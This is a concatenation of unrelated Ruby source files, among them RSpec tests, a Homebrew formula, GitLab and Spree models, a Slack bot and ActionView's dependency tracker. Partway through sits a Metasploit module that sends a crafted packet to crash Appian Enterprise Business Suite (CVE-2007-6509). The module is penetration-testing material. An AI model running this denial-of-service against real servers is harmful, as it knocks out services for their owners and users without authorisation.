'baz', 'extra' => 'bar', 'content' => 'foo' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'extra' => 'bar', 'content' => 'foo')).to eq 'test' => 'foo baz bar' } it { expect(i.transform('test' => '/*...content...*/ baz', 'extra' => 'bar', 'content' => 'foo')).to eq 'extra' => 'bar', 'test' => 'foo baz' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'content' => 'foo')).to eq 'test' => 'foo baz /*...extra...*/' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'content' => 'foo', 'extra' => '')).to eq 'test' => 'foo baz ' } end end
54.727273
189
0.43588
e8a512886b6170f40893541e70c30e2c023f1e85
1,575
class Makefile2graph < Formula desc "Create a graph of dependencies from GNU-Make" homepage "https://github.com/lindenb/makefile2graph" url "https://github.com/lindenb/makefile2graph/archive/v1.5.0.tar.gz" sha256 "9464c6c1291609c211284a9889faedbab22ef504ce967b903630d57a27643b40" head "https://github.com/lindenb/makefile2graph.git" bottle do cellar :any_skip_relocation sha256 "af7dba0cbb045f067076706310b30c52eddbd6732e60d16017ccbfadd4bc866d" => :catalina sha256 "5b5cb69a698628af41b3de70146580bbcb2e88a8b6d87d7fe9b4f58a2f2fdfb2" => :mojave sha256 "51231ed0ef44fd31a10f4ea0a7500570181332786ddd5a8a9a886958ad1b1408" => :high_sierra sha256 "274ee025c45df9757d608249d64105b9314c8e59fc52a81ad6906f807498b67c" => :sierra sha256 "ed1939b1b0fd106f3e328e310a887cf454b81481f78fdf57ce75c0480a922d7d" => :el_capitan sha256 "37aebae489e0f341f80417ec711e5c2817f5b8097c3493dcc11bc754bdd1b1cf" => :yosemite sha256 "0de3d4a2492797c3259798493e287ac2403f02254c6cfcf74948a16bcc4bcd0d" => :mavericks end depends_on "graphviz" def install system "make" system "make", "test" bin.install "make2graph", "makefile2graph" man1.install "make2graph.1", "makefile2graph.1" doc.install "LICENSE", "README.md", "screenshot.png" end test do (testpath/"Makefile").write <<~EOS all: foo all: bar foo: ook bar: ook ook: EOS system "make -Bnd >make-Bnd" system "#{bin}/make2graph <make-Bnd" system "#{bin}/make2graph --root <make-Bnd" system "#{bin}/makefile2graph" end end
36.627907
93
0.754921
e2a8f77acaec8e0a12a0d3dea9d38f74477f71cc
90
Rails.application.routes.draw do mount Mayodon::Webapp::Engine => "/mayodon-webapp" end
22.5
52
0.755556
877866b9b232d10da9b57c93a0330cb451d0880b
2,047
# frozen_string_literal: true module Gitlab module Database # This abstract class is used for models which need to exist in multiple de-composed databases. class SharedModel < ActiveRecord::Base self.abstract_class = true # if shared model is used, this allows to limit connections # on which this model is being shared class_attribute :limit_connection_names, default: nil class << self def using_connection(connection) previous_connection = self.overriding_connection unless previous_connection.nil? || previous_connection.equal?(connection) raise "Cannot change connection for Gitlab::Database::SharedModel "\ "from '#{Gitlab::Database.db_config_name(previous_connection)}' "\ "to '#{Gitlab::Database.db_config_name(connection)}'" end # connection might not be yet adopted (returning nil, and no gitlab_schemas) # in such cases it is fine to ignore such connections gitlab_schemas = Gitlab::Database.gitlab_schemas_for_connection(connection) unless gitlab_schemas.nil? || gitlab_schemas.include?(:gitlab_shared) raise "Cannot set `SharedModel` to connection from `#{Gitlab::Database.db_config_name(connection)}` " \ "since this connection does not include `:gitlab_shared` schema." end self.overriding_connection = connection yield ensure self.overriding_connection = previous_connection end def connection if connection = self.overriding_connection connection else super end end private def overriding_connection Thread.current[:overriding_connection] end def overriding_connection=(connection) Thread.current[:overriding_connection] = connection end end def connection_db_config self.class.connection_db_config end end end end
31.984375
115
0.656082
f8b29f8ae0a5cad27c73e2b7deabf08e1171d865
212
class AddImageToProducts < ActiveRecord::Migration[5.0] def self.up change_table :products do |t| t.attachment :image end end def self.down drop_attached_file :products, :image end end
17.666667
55
0.698113
79fde515490f6f4c552566358efc701e10b563ac
1,126
# Configure Rails Environment ENV["RAILS_ENV"] = "test" require_relative "../test/dummy/config/environment" ActiveRecord::Migrator.migrations_paths = [File.expand_path("../test/dummy/db/migrate", __dir__)] require "rails/test_help" # Filter out Minitest backtrace while allowing backtrace from other libraries # to be shown. Minitest.backtrace_filter = Minitest::BacktraceFilter.new require "rails/test_unit/reporter" Rails::TestUnitReporter.executable = 'bin/test' # Load fixtures from the engine if ActiveSupport::TestCase.respond_to?(:fixture_path=) ActiveSupport::TestCase.fixture_path = File.expand_path("fixtures", __dir__) ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files" ActiveSupport::TestCase.fixtures :all end class ActiveSupport::TestCase private def create_file_blob(filename:, content_type:, metadata: nil) ActiveStorage::Blob.create_after_upload! io: file_fixture(filename).open, filename: filename, content_type: content_type, metadata: metadata end end
38.827586
146
0.796625
ed3dfd9bd44b4cb2dccc35d517b6f0e304d2733d
944
require 'rails_helper' include Warden::Test::Helpers RSpec.describe Admin::CustomEmailsController do let!(:admin) {create(:admin, superadmin: true)} before do sign_in admin end describe "GET show" do it "renders the show template" do get :show expect(assigns(:form).present?).to be_truthy expect(response).to render_template("show") end end describe "POST create" do it "should create a message" do post :create, params: { custom_email_form: { message: 'test', scope: 'myself', subject: 'test' } } expect(response).to redirect_to admin_custom_email_path post :create, params: { custom_email_form: { message: 'test', scope: 'myself', subject: 'test' } } expect(response).to redirect_to admin_custom_email_path end it "should render show" do post :create, params: { custom_email_form: { } } expect(response).to render_template("show") end end end
30.451613
104
0.681144
b99034853409187aa2f2f1204a84d314944ddadd
2,209
# frozen_string_literal: true require 'rails_helper' require 'gumboot/shared_examples/application_controller' class SomeReportsController < ApplicationController; end RSpec.describe ApplicationController, type: :controller do include_examples 'Application controller' controller do before_action :ensure_authenticated def federation_growth public_action render nothing: true end end before do @routes.draw do match 'some_reports/report_action/:id' => 'some_reports#report_action', via: %i[get post] match 'anonymous/federation_growth' => 'anonymous#federation_growth', via: %i[get post] end end context 'when request is session' do it 'POST request should not create a uri session' do post :federation_growth expect(session).not_to include(:return_url) end it 'GET request should not create a uri session' do get :federation_growth uri = URI.parse(session[:return_url]) expect(uri.path).to eq('/anonymous/federation_growth') expect(uri.query).to be_blank expect(uri.fragment).to be_blank end it 'GET request should create a uri session including fragments' do get :federation_growth, params: { time: 1000 } uri = URI.parse(session[:return_url]) expect(uri.path).to eq('/anonymous/federation_growth') expect(uri.query).to eq('time=1000') expect(uri.fragment).to be_blank end end context 'use time zone around filter' do let(:user) { create :subject, :authorized } let!(:zone) { Faker::Address.time_zone } controller SomeReportsController do before_action :ensure_authenticated def report_action public_action @text = Time.zone.name head :accepted end end before do session[:subject_id] = user.try(:id) Rails.application.config.reporting_service.time_zone = zone routes.draw { get 'report_action' => 'some_reports#report_action' } get :report_action end # timezone within actions specify 'inside action scope' do expect(assigns[:text]).to eq(zone) expect(Time.zone.name).not_to eq(zone) end end end
26.939024
77
0.685831
b983774bbab988c12e7c8dbf38dcfa2e92c810b4
3,939
# frozen_string_literal: true require 'test_helper' class DeletePlainObjectWorkerTest < ActiveSupport::TestCase class DestroyableObjectsTest < DeletePlainObjectWorkerTest def setup factory_names = %i[simple_provider service application_plan metric] @objects = factory_names.map { |factory_name| FactoryBot.create(factory_name) } end attr_reader :objects def test_perform_destroy_by_association objects.each do |object| DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) assert object.destroyed_by_association assert_raise(ActiveRecord::RecordNotFound) { object.reload } end end def test_perform_destroy_without_association objects.each do |object| DeletePlainObjectWorker.perform_now(object, %w[HTestClass123]) refute object.destroyed_by_association assert_raise(ActiveRecord::RecordNotFound) { object.reload } end end end class UndestroyableObjectsTest < DeletePlainObjectWorkerTest def setup @object = FactoryBot.create(:service) @object.stubs(:destroyable?).returns(false) end attr_reader :object def test_perform_destroy_by_association DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) System::ErrorReporting.expects(:report_error).never assert_nothing_raised(ActiveRecord::RecordNotDestroyed) { DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) } refute object.destroyed? end def test_perform_destroy_without_association System::ErrorReporting.expects(:report_error).once.with do |exception, options| exception.is_a?(ActiveRecord::RecordNotDestroyed) \ && (parameters = options[:parameters]) \ && parameters[:caller_worker_hierarchy] == ['Hierarchy-TestClass-123', "Plain-#{object.class}-#{object.id}"] \ && parameters[:error_messages] == ['This service cannot be removed'] end assert_nothing_raised(ActiveRecord::RecordNotDestroyed) { DeletePlainObjectWorker.perform_now(object, %w[Hierarchy-TestClass-123]) } refute object.destroyed? end end class StaleObjectErrorTest < DeletePlainObjectWorkerTest module LoadTargetWithFiber # Overriding the `delete` method of HasOneAssociation https://github.com/rails/rails/blob/4-2-stable/activerecord/lib/active_record/associations/has_one_association.rb#L53-L64 # When entering this method, override the `load_target` method so we can hand over the execution to the main thread def delete def load_target super.tap { Fiber.yield } end super end end def test_race_condition service = FactoryBot.create(:simple_service) # There is a restriction on deleting service, at least one should remain FactoryBot.create(:simple_service, account: service.account) proxy = Proxy.find service.proxy.id service = Service.find service.id # Make sure that there is no more than one because it is a `has_one` association assert_equal 1, Proxy.where(service_id: service.id).count proxy_association = service.association :proxy # Hook into the Eigenclass class << proxy_association prepend LoadTargetWithFiber end # Execute deletion of service but suspend the execution of deleting the proxy by `:dependent => :destroy` f1 = Fiber.new do DeletePlainObjectWorker.perform_now(service, ['Hierarchy-Service-ID']) end # Destroy the proxy in another thread f2 = Fiber.new do DeletePlainObjectWorker.perform_now(proxy, ['Hierarchy-Service-ID', 'Hierarchy-Proxy-ID']) end f1.resume f2.resume f1.resume assert_raise(ActiveRecord::RecordNotFound) { proxy.reload } assert_raise(ActiveRecord::RecordNotFound) { service.reload } end end end
36.137615
181
0.720741
3835aa1bc243df5f8402bba70c0c239be7bfffd4
121
Rails.application.routes.draw do root :to => redirect("/style-guide") mount StyleGuide::Engine => "/style-guide" end
24.2
44
0.710744
abc0fd99488a824d09e82623f975babade3b5a20
628
require 'active_support/concern' require 'rails/rack/logger' module Rails module Rack # Overwrites defaults of Rails::Rack::Logger that cause # unnecessary logging. # This effectively removes the log lines from the log # that say: # Started GET / for 192.168.2.1... class Logger # Overwrites Rails 3.2 code that logs new requests def call_app(*args) env = args.last @app.call(env) ensure ActiveSupport::LogSubscriber.flush_all! end # Overwrites Rails 3.0/3.1 code that logs new requests def before_dispatch(env) end end end end
24.153846
60
0.652866
79fb5374dbdaddca7fd909defec24c53c0e5d067
1,702
module Spree class StockItem < ActiveRecord::Base acts_as_paranoid belongs_to :stock_location, class_name: 'Spree::StockLocation' belongs_to :variant, class_name: 'Spree::Variant', touch: true has_many :stock_movements validates_presence_of :stock_location, :variant validates_uniqueness_of :variant_id, scope: [:stock_location_id, :deleted_at] delegate :weight, :should_track_inventory?, to: :variant def backordered_inventory_units Spree::InventoryUnit.backordered_for_stock_item(self) end def variant_name variant.name end def adjust_count_on_hand(value) self.with_lock do self.count_on_hand = self.count_on_hand + value process_backorders(count_on_hand - count_on_hand_was) self.save! end end def set_count_on_hand(value) self.count_on_hand = value process_backorders(count_on_hand - count_on_hand_was) self.save! end def in_stock? self.count_on_hand > 0 end # Tells whether it's available to be included in a shipment def available? self.in_stock? || self.backorderable? end private def count_on_hand=(value) write_attribute(:count_on_hand, value) end # Process backorders based on amount of stock received # If stock was -20 and is now -15 (increase of 5 units), then we should process 5 inventory orders. # If stock was -20 but then was -25 (decrease of 5 units), do nothing. def process_backorders(number) if number > 0 backordered_inventory_units.first(number).each do |unit| unit.fill_backorder end end end end end
26.59375
105
0.683314
0318d1798c42768e8221ea9f2e58d96db6ac656d
172
# frozen_string_literal: true require 'test_helper' class EvidencesControllerTest < ActionDispatch::IntegrationTest # test "the truth" do # assert true # end end
17.2
63
0.755814
388c5a605ee6b3a301d2d9826bd7f1669a30a306
674
module Chapex module Check # check class base class Base @subclasses = [] def self.inherited(subclass) @subclasses << subclass.new end def self.all @subclasses end attr_reader :violations def initialize @violations = [] end def add_violation(location, *message_args) message = build_message(message_args) violation = Violation.new(message, location) @violations << violation end def build_message(args) if args.length.zero? self.class::MSG else self.class::MSG % args end end end end end
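# Illustrative sketch of a concrete check built on the base class above. The MSG
# constant and the format argument follow the build_message contract; the #check
# entry point is hypothetical, and Violation plus the location object are assumed
# to be provided elsewhere in the gem.
module Chapex
  module Check
    class LineLength < Base
      MSG = 'Line is longer than %d characters'

      def check(line, location, limit = 80)
        add_violation(location, limit) if line.length > limit
      end
    end
  end
end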
18.216216
52
0.568249
4a1d5f24361734d7e86b1c46533bcd307e1153c5
171
class User < ActiveRecord::Base validates_presence_of :username has_secure_password has_many :user_workouts has_many :workouts, through: :user_workouts end
28.5
47
0.777778
87a0662e1620dca199ef85bb6bec47e1dd26ec30
439
module Grape module Validations class PresenceValidator < Validator def validate!(params) return unless @scope.should_validate?(params) super end def validate_param!(attr_name, params) unless params.respond_to?(:key?) && params.key?(attr_name) raise Grape::Exceptions::Validation, param: @scope.full_name(attr_name), message_key: :presence end end end end end
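# Hedged sketch of the user-facing DSL that ends up exercising this validator:
# `requires` inside a Grape `params` block registers a presence validation, so a
# missing parameter is rejected before the route block runs. Endpoint names and
# paths below are made up for illustration.
require 'grape'

class GreetingAPI < Grape::API
  format :json

  params do
    requires :name, type: String
  end
  get :greet do
    { greeting: "Hello, #{params[:name]}" }
  end
end
# GET /greet          -> 400 ("name is missing")
# GET /greet?name=Ada -> 200 {"greeting":"Hello, Ada"}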
25.823529
105
0.658314
1aa337ac21a7c35dd606fdc57d8d8fb636ac7889
213
# frozen_string_literal: true

# Builds the reversed string by walking the input from its last index down to 0.
def reverse(input)
  reversed = ''
  index = input.length - 1
  while index >= 0
    reversed += input[index]
    index -= 1
  end
  reversed
end
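# Quick illustrative checks of the helper above (expected values shown as comments):
reverse('hello')   # => "olleh"
reverse('')        # => ""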
19.363636
36
0.713615
8766b58a463197dd5cd927a0da866ffae12b52e3
539
class ServiceInstanceUsageQuery attr_reader :instance def initialize(instance) @instance = instance end def execute db_name = instance.db_name escaped_database = ActiveRecord::Base.connection.quote(db_name) query = <<-SQL SELECT SUM(ROUND(((data_length + index_length) / 1024 / 1024), 2)) FROM information_schema.TABLES WHERE table_schema = #{escaped_database} SQL result_set = ActiveRecord::Base.connection.execute(query).first result = result_set.first result.to_f end end
23.434783
72
0.710575
016f596e4e84e94e3e4b5712a8887308fc01b478
4,645
class Bot DM_CHANNEL_PREFIX = 'D' DM_RESPONSE = configatron.bot.dm_response PUBLIC_CHANNEL_NAME = configatron.bot.channel_name ERROR_RESPONSE = configatron.bot.error_response BOT_NAME = configatron.bot.name @instance = nil def self.instance @instance end def self.create(client, storage, log) raise 'bot already instantiated' if @instance&.client_started? @instance = Bot.new(client, storage, log) client.on :message do |data| @instance.process_message(data) end Thread.abort_on_exception = true thread = Thread.new do begin client.start! rescue StandardError => e log.something_went_wrong(e) end end sleep 1 until client.started? || !thread.alive? unless !thread.alive? @instance.store_channel_id @instance.store_filter_ids end end def initialize(client, storage, log) @client = client @storage = storage @log = log @filter_ids = [] end def process_message(data) return unless data.channel && data.channel[0] == DM_CHANNEL_PREFIX @log.dm_received begin last_message = @storage.last_message if valid_message?(data, last_message) handle_message(data.text, data.channel) else @log.invalid_message end rescue StandardError => e @log.something_went_wrong(e) @client.message(channel: data.channel, text: ERROR_RESPONSE) end end def client_started? @client.started? end def store_channel_id channel = @client.channels.values.detect do |ch| ch.name == PUBLIC_CHANNEL_NAME end @channel_id = channel.id @log.output_channel(@channel_id) end def store_filter_ids @client.users.map { |id, user| @filter_ids.push user.id if user.is_bot || user.name == 'slackbot' } @log.filter_ids(@filter_ids) end private def valid_message?(data, last_message) !@filter_ids.include?(data.user) && !data.text.nil? && data.text != last_message && data.text != DM_RESPONSE && data.text != ERROR_RESPONSE && data.text.length > 1 end def handle_message(message, dm_channel) @log.posting_to_channel(message) @client.message(channel: @channel_id, text: message) @storage.last_message = message @log.reply_to_user @client.message(channel: dm_channel, text: DM_RESPONSE) end end class Storage @instance = nil def self.instance @instance end def self.create @instance = Storage.new(configatron.redis.url) unless @instance @instance end def initialize(url) @store = Redis.new(url: url, driver: :ruby, ssl_params: { verify_mode: OpenSSL::SSL::VERIFY_NONE }) end def last_message @store.get('lm') end def last_message=(message) @store.set('lm', message) @store.expire('lm', 30) end def token=(token) @store.set('token', token) end def token @store.get('token') end end class Log @instance = nil def self.instance @instance end def self.create return @instance if @instance @instance = Log.new @instance end def initialize @stdout = Logger.new(STDOUT) @file_out = Logger.new('slack_bot.log', 10, 1_024_000) end def output_channel(channel) @stdout.info('channel id') { "public message output channel: #{channel}" } @file_out.info('channel id') { "public message output channel: #{channel}" } end def filter_ids(ids) @stdout.info('filter ids') { "filtering: #{ids.inspect}" } @file_out.info('filter ids') { "filtering: #{ids.inspect}" } end def dm_received @stdout.info('DM recieved') @file_out.info('DM recieved') end def posting_to_channel(message) @stdout.info('post message') { "Posting message to public channel: '#{message}'" } @file_out.info('post message') { "Posting message public channel: '#{message}'" } end def reply_to_user @stdout.info('replying to user') @file_out.info('replying to user') end def invalid_message @stdout.info("invalid message") @file_out.info("invalid message") end 
def getting_token @stdout.info('requesting oAuth token') @file_out.info('requesting oAuth token') end def using_stored_token @stdout.info('Using stored oAuth token') @file_out.info('Using stored oAuth token') end def success @stdout.info('Success.') @file_out.info('Success.') end def something_went_wrong(error) @stdout.fatal('ERROR') { error.message } @stdout.warn('TRACE:') { error.backtrace } @file_out.fatal('ERROR') { error.message } @file_out.warn('TRACE:') { error.backtrace } end end
22.22488
103
0.665877
f82e2b761152b04bfcd8c83b9ba5658758f156f3
400
require 'array/hash_builder' class Array def chain_map(*methods) result = self result = result.map(&(methods.shift)) until methods.empty? return result unless block_given? result.map { |*args| yield(*args) } end def as_hash(keys) Array::HashBuilder.new(self, keys).build end def random self[rand(size)] end def random! self.slice!(rand(size)) end end
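# A few hypothetical calls against the extensions above (expected results as
# comments). #as_hash is omitted here since it delegates to Array::HashBuilder.
%w[foo bar].chain_map(:upcase, :reverse)        # => ["OOF", "RAB"]
%w[foo bar].chain_map(:upcase) { |s| "#{s}!" }  # => ["FOO!", "BAR!"]
[1, 2, 3].random                                # => 1, 2 or 3, chosen at random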
16.666667
62
0.665
aba2a826d97760fa87d841e09394f0e9302d4df1
1,940
# # Search component: # * prompt for search # * display matching paragraphs from agenda, highlighting search strings # * keep query string in window location URL in synch # class Search < Vue # initialize query text based on data passed to the component def initialize @text = @@item.query || '' end def render # search input field _div.search do _label 'Search:', for: 'search_text' _input.search_text! autofocus: 'autofocus', value: @text, onInput: self.input end if @text.length > 2 matches = false text = @text.downcase() Agenda.index.each do |item| next unless item.text and item.text.downcase().include? text matches = true _section do _h4 {_Link text: item.title, href: item.href} # highlight matching strings in paragraph item.text.split(/\n\s*\n/).each do |paragraph| if paragraph.downcase().include? text _pre.report domPropsInnerHTML: htmlEscape(paragraph).gsub(/(#{text})/i, "<span class='hilite'>$1</span>") end end end end # if no sections were output, indicate 'no matches' _p {_em 'No matches'} unless matches else # start producing query results when input string has three characters _p 'Please enter at least three characters' end end # update text whenever input changes def input(event) @text = event.target.value end # set history on initial rendering def mounted() self.updateHistory() end # replace history state on subsequent renderings def updated() self.updateHistory() end def updateHistory() state = {path: 'search', query: @text} if state.query history.replaceState(state, nil, "search?q=#{encodeURIComponent(@text)}") else history.replaceState(state, nil, 'search') end end end
24.556962
79
0.626804
d520ecbc80ec9025e30426e4b7f8bdf6749bcdbf
1,305
require File.expand_path('../boot', __FILE__) require 'rails/all' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module LineItemImporter class Application < Rails::Application config.middleware.use 'Rack::RawUpload', :paths => ['/attachments'] # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. config.autoload_paths += %W(#{config.root}/lib) # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. # config.time_zone = 'Central Time (US & Canada)' # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] # config.i18n.default_locale = :de # reset #"ALLOW-FROM " so site can be iframed from every origin config.action_dispatch.default_headers['X-Frame-Options'] = nil end end FileUtils.mkdir_p(Rails.root.join('tmp', 'attachments'))
43.5
99
0.720307
382f56db4fd6c49bcce45a7f57124c76d0a667d3
4,066
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS', 'Description' => %q{ This module exploits a denial of service flaw in the Appian Enterprise Business Suite service. }, 'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6509'], ['OSVDB', '39500'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html'] ], 'DisclosureDate' => 'Dec 17 2007' )) register_options([Opt::RPORT(5400),], self.class) end def run print_status('Connecting to the service...') connect # mod: randomize the static "saint" strings from the PoC - hdm req = "\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00" + Rex::Text.rand_text_alpha(2) + "\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x31\x35\x39\x36\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x04\x03\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00" + Rex::Text.rand_text_alpha(5) + "\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x05" + Rex::Text.rand_text_alpha(5) + "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x0a\x05\x00\x00\x00\x43\x54\x2d\x4c\x69\x62\x72\x61\x72\x79"+ "\x0a\x05\x00\x00\x00\x00\x0d\x11\x00\x73\x5f\x65\x6e\x67\x6c\x69"+ "\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x02\x01\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x69\x73\x6f"+ "\x5f\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x35\x31\x32"+ "\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+ "\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+ "\x00" print_status('Sending exploit...') sock.put(req) disconnect end end
39.096154
87
0.659616
b9749bab84fd49dd55d48a752080107b88134ee4
6,262
# frozen_string_literal: true require "concurrent/map" require "action_view/path_set" module ActionView class DependencyTracker # :nodoc: @trackers = Concurrent::Map.new def self.find_dependencies(name, template, view_paths = nil) tracker = @trackers[template.handler] return [] unless tracker tracker.call(name, template, view_paths) end def self.register_tracker(extension, tracker) handler = Template.handler_for_extension(extension) if tracker.respond_to?(:supports_view_paths?) @trackers[handler] = tracker else @trackers[handler] = lambda { |name, template, _| tracker.call(name, template) } end end def self.remove_tracker(handler) @trackers.delete(handler) end class ERBTracker # :nodoc: EXPLICIT_DEPENDENCY = /# Template Dependency: (\S+)/ # A valid ruby identifier - suitable for class, method and specially variable names IDENTIFIER = / [[:alpha:]_] # at least one uppercase letter, lowercase letter or underscore [[:word:]]* # followed by optional letters, numbers or underscores /x # Any kind of variable name. e.g. @instance, @@class, $global or local. # Possibly following a method call chain VARIABLE_OR_METHOD_CHAIN = / (?:\$|@{1,2})? # optional global, instance or class variable indicator (?:#{IDENTIFIER}\.)* # followed by an optional chain of zero-argument method calls (?<dynamic>#{IDENTIFIER}) # and a final valid identifier, captured as DYNAMIC /x # A simple string literal. e.g. "School's out!" STRING = / (?<quote>['"]) # an opening quote (?<static>.*?) # with anything inside, captured as STATIC \k<quote> # and a matching closing quote /x # Part of any hash containing the :partial key PARTIAL_HASH_KEY = / (?:\bpartial:|:partial\s*=>) # partial key in either old or new style hash syntax \s* # followed by optional spaces /x # Part of any hash containing the :layout key LAYOUT_HASH_KEY = / (?:\blayout:|:layout\s*=>) # layout key in either old or new style hash syntax \s* # followed by optional spaces /x # Matches: # partial: "comments/comment", collection: @all_comments => "comments/comment" # (object: @single_comment, partial: "comments/comment") => "comments/comment" # # "comments/comments" # 'comments/comments' # ('comments/comments') # # (@topic) => "topics/topic" # topics => "topics/topic" # (message.topics) => "topics/topic" RENDER_ARGUMENTS = /\A (?:\s*\(?\s*) # optional opening paren surrounded by spaces (?:.*?#{PARTIAL_HASH_KEY}|#{LAYOUT_HASH_KEY})? # optional hash, up to the partial or layout key declaration (?:#{STRING}|#{VARIABLE_OR_METHOD_CHAIN}) # finally, the dependency name of interest /xm LAYOUT_DEPENDENCY = /\A (?:\s*\(?\s*) # optional opening paren surrounded by spaces (?:.*?#{LAYOUT_HASH_KEY}) # check if the line has layout key declaration (?:#{STRING}|#{VARIABLE_OR_METHOD_CHAIN}) # finally, the dependency name of interest /xm def self.supports_view_paths? 
# :nodoc: true end def self.call(name, template, view_paths = nil) new(name, template, view_paths).dependencies end def initialize(name, template, view_paths = nil) @name, @template, @view_paths = name, template, view_paths end def dependencies render_dependencies + explicit_dependencies end attr_reader :name, :template private :name, :template private def source template.source end def directory name.split("/")[0..-2].join("/") end def render_dependencies render_dependencies = [] render_calls = source.split(/\brender\b/).drop(1) render_calls.each do |arguments| add_dependencies(render_dependencies, arguments, LAYOUT_DEPENDENCY) add_dependencies(render_dependencies, arguments, RENDER_ARGUMENTS) end render_dependencies.uniq end def add_dependencies(render_dependencies, arguments, pattern) arguments.scan(pattern) do match = Regexp.last_match add_dynamic_dependency(render_dependencies, match[:dynamic]) add_static_dependency(render_dependencies, match[:static], match[:quote]) end end def add_dynamic_dependency(dependencies, dependency) if dependency dependencies << "#{dependency.pluralize}/#{dependency.singularize}" end end def add_static_dependency(dependencies, dependency, quote_type) if quote_type == '"' # Ignore if there is interpolation return if dependency.include?('#{') end if dependency if dependency.include?("/") dependencies << dependency else dependencies << "#{directory}/#{dependency}" end end end def resolve_directories(wildcard_dependencies) return [] unless @view_paths return [] if wildcard_dependencies.empty? # Remove trailing "*" prefixes = wildcard_dependencies.map { |query| query[0..-2] } @view_paths.flat_map(&:all_template_paths).uniq.select { |path| prefixes.any? do |prefix| path.start_with?(prefix) && !path.index("/", prefix.size) end }.sort end def explicit_dependencies dependencies = source.scan(EXPLICIT_DEPENDENCY).flatten.uniq wildcards, explicits = dependencies.partition { |dependency| dependency.end_with?("*") } (explicits + resolve_directories(wildcards)).uniq end end register_tracker :erb, ERBTracker end end
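# Hedged, self-contained sketch of driving the ERB tracker directly: the template
# double only needs to respond to #source, which is all the tracker reads in this
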